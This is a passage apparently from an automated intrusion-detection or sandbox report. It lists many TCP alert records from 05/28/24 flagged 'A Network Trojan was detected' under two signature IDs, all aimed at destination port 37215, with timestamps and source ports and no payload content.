          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175530
          SID:2835222
          Source Port:42202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338115
          SID:2829579
          Source Port:32928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532780
          SID:2835222
          Source Port:44198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009970
          SID:2835222
          Source Port:46370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044162
          SID:2829579
          Source Port:42896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212717
          SID:2829579
          Source Port:44952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549451
          SID:2829579
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726695
          SID:2835222
          Source Port:44860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325801
          SID:2835222
          Source Port:57948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922673
          SID:2829579
          Source Port:39836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547056
          SID:2835222
          Source Port:45768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201144
          SID:2835222
          Source Port:55302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329579
          SID:2835222
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301164
          SID:2835222
          Source Port:41210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848322
          SID:2829579
          Source Port:57110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.374598
          SID:2829579
          Source Port:54516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536388
          SID:2835222
          Source Port:60738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325376
          SID:2829579
          Source Port:56162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793274
          SID:2835222
          Source Port:53210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613845
          SID:2829579
          Source Port:53810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151294
          SID:2835222
          Source Port:46204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592881
          SID:2835222
          Source Port:42516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537282
          SID:2829579
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976634
          SID:2835222
          Source Port:47038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152178
          SID:2835222
          Source Port:54570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742456
          SID:2835222
          Source Port:45962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860946
          SID:2835222
          Source Port:41474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592165
          SID:2829579
          Source Port:57898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152885
          SID:2835222
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745737
          SID:2829579
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197996
          SID:2835222
          Source Port:59684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.131191
          SID:2829579
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543563
          SID:2829579
          Source Port:37092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560484
          SID:2829579
          Source Port:40242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795108
          SID:2829579
          Source Port:43758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206420
          SID:2829579
          Source Port:42280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267966
          SID:2829579
          Source Port:53124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311116
          SID:2829579
          Source Port:42084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466179
          SID:2835222
          Source Port:48256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336928
          SID:2835222
          Source Port:36406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437508
          SID:2835222
          Source Port:50342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810657
          SID:2835222
          Source Port:52434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203785
          SID:2829579
          Source Port:58840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268733
          SID:2829579
          Source Port:35708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859068
          SID:2835222
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463480
          SID:2829579
          Source Port:48444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266605
          SID:2829579
          Source Port:35350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317039
          SID:2835222
          Source Port:45286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208420
          SID:2835222
          Source Port:59460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922499
          SID:2835222
          Source Port:58342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742444
          SID:2829579
          Source Port:36002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818096
          SID:2829579
          Source Port:43774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476513
          SID:2829579
          Source Port:60748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552756
          SID:2829579
          Source Port:43948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357085
          SID:2829579
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196606
          SID:2829579
          Source Port:39856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879324
          SID:2835222
          Source Port:34606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922611
          SID:2829579
          Source Port:46246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153358
          SID:2835222
          Source Port:57416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356726
          SID:2835222
          Source Port:48320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551190
          SID:2835222
          Source Port:47868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291671
          SID:2835222
          Source Port:59456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.623857
          SID:2829579
          Source Port:54788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330178
          SID:2835222
          Source Port:57872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.444134
          SID:2835222
          Source Port:46174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272778
          SID:2835222
          Source Port:37452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771478
          SID:2835222
          Source Port:46962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963974
          SID:2835222
          Source Port:55616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552477
          SID:2829579
          Source Port:44364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.686448
          SID:2835222
          Source Port:48628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138146
          SID:2829579
          Source Port:43218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083443
          SID:2829579
          Source Port:43006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325286
          SID:2829579
          Source Port:47634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664315
          SID:2835222
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793363
          SID:2835222
          Source Port:36978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211430
          SID:2829579
          Source Port:32992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357042
          SID:2829579
          Source Port:53716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538893
          SID:2835222
          Source Port:33342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.847372
          SID:2829579
          Source Port:39088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778592
          SID:2835222
          Source Port:47002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465355
          SID:2835222
          Source Port:37472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226291
          SID:2835222
          Source Port:45114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327768
          SID:2835222
          Source Port:42534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241110
          SID:2829579
          Source Port:38404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483121
          SID:2835222
          Source Port:53152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528331
          SID:2835222
          Source Port:47660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960751
          SID:2829579
          Source Port:43388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943398
          SID:2835222
          Source Port:59000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223347
          SID:2835222
          Source Port:50194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465186
          SID:2829579
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774641
          SID:2829579
          Source Port:53088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087817
          SID:2835222
          Source Port:53630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.692112
          SID:2835222
          Source Port:46560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237034
          SID:2835222
          Source Port:37326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.705819
          SID:2835222
          Source Port:59948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307774
          SID:2835222
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178129
          SID:2835222
          Source Port:42296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079657
          SID:2829579
          Source Port:55674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085307
          SID:2835222
          Source Port:58916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400476
          SID:2829579
          Source Port:58052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941679
          SID:2835222
          Source Port:47796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156610
          SID:2829579
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816730
          SID:2829579
          Source Port:38376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116767
          SID:2835222
          Source Port:40310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330000
          SID:2835222
          Source Port:53802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145157
          SID:2829579
          Source Port:56182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177196
          SID:2835222
          Source Port:53686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231637
          SID:2829579
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.869139
          SID:2835222
          Source Port:32836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.937910
          SID:2829579
          Source Port:40792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680272
          SID:2835222
          Source Port:39710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793929
          SID:2835222
          Source Port:57610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592473
          SID:2835222
          Source Port:59410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115592
          SID:2829579
          Source Port:42618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341245
          SID:2829579
          Source Port:44630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475925
          SID:2829579
          Source Port:37734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542984
          SID:2835222
          Source Port:57214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977900
          SID:2835222
          Source Port:57082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237129
          SID:2829579
          Source Port:59344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324105
          SID:2829579
          Source Port:56110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958786
          SID:2829579
          Source Port:33648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064893
          SID:2835222
          Source Port:58702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532718
          SID:2835222
          Source Port:35448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305637
          SID:2835222
          Source Port:56410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594894
          SID:2835222
          Source Port:38992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543615
          SID:2835222
          Source Port:50586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063091
          SID:2829579
          Source Port:47538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244644
          SID:2835222
          Source Port:49854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156249
          SID:2829579
          Source Port:39752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678160
          SID:2835222
          Source Port:44076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402359
          SID:2835222
          Source Port:38936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.606960
          SID:2829579
          Source Port:46320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178946
          SID:2829579
          Source Port:34948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196271
          SID:2835222
          Source Port:35468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840486
          SID:2829579
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187908
          SID:2835222
          Source Port:35400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464026
          SID:2829579
          Source Port:51238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922804
          SID:2835222
          Source Port:41004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809849
          SID:2829579
          Source Port:52348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147248
          SID:2835222
          Source Port:39364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267444
          SID:2829579
          Source Port:41076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399920
          SID:2835222
          Source Port:53862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044521
          SID:2835222
          Source Port:53862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152825
          SID:2835222
          Source Port:41968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678245
          SID:2829579
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405408
          SID:2829579
          Source Port:59018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267584
          SID:2829579
          Source Port:35314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.161544
          SID:2835222
          Source Port:50396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855161
          SID:2829579
          Source Port:40288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294674
          SID:2835222
          Source Port:52938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480906
          SID:2829579
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114578
          SID:2829579
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.206913
          SID:2835222
          Source Port:60170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782801
          SID:2829579
          Source Port:55840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.037636
          SID:2835222
          Source Port:42408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627469
          SID:2835222
          Source Port:44026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923617
          SID:2829579
          Source Port:55350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689778
          SID:2829579
          Source Port:42606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215955
          SID:2835222
          Source Port:39782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114392
          SID:2835222
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.550101
          SID:2829579
          Source Port:60170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755967
          SID:2835222
          Source Port:45394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178066
          SID:2835222
          Source Port:52308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206388
          SID:2829579
          Source Port:34140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211474
          SID:2835222
          Source Port:60960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914330
          SID:2835222
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908024
          SID:2835222
          Source Port:39800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039817
          SID:2829579
          Source Port:58618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142070
          SID:2829579
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154051
          SID:2835222
          Source Port:50948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664236
          SID:2829579
          Source Port:57018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.037611
          SID:2829579
          Source Port:59548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182702
          SID:2829579
          Source Port:55250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732174
          SID:2829579
          Source Port:34332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528294
          SID:2835222
          Source Port:48306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859226
          SID:2835222
          Source Port:46658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979621
          SID:2835222
          Source Port:33212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123725
          SID:2835222
          Source Port:55258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175453
          SID:2829579
          Source Port:37750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797786
          SID:2835222
          Source Port:35816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225418
          SID:2835222
          Source Port:41822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216340
          SID:2829579
          Source Port:53084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513896
          SID:2835222
          Source Port:44070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960330
          SID:2835222
          Source Port:39004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411845
          SID:2835222
          Source Port:48594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487623
          SID:2829579
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537459
          SID:2835222
          Source Port:49500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.419939
          SID:2835222
          Source Port:39768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.159655
          SID:2835222
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763619
          SID:2835222
          Source Port:34716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.418042
          SID:2835222
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147958
          SID:2829579
          Source Port:60118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291575
          SID:2835222
          Source Port:58598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497222
          SID:2835222
          Source Port:55464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154602
          SID:2835222
          Source Port:48086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269779
          SID:2829579
          Source Port:60484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767615
          SID:2829579
          Source Port:33970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
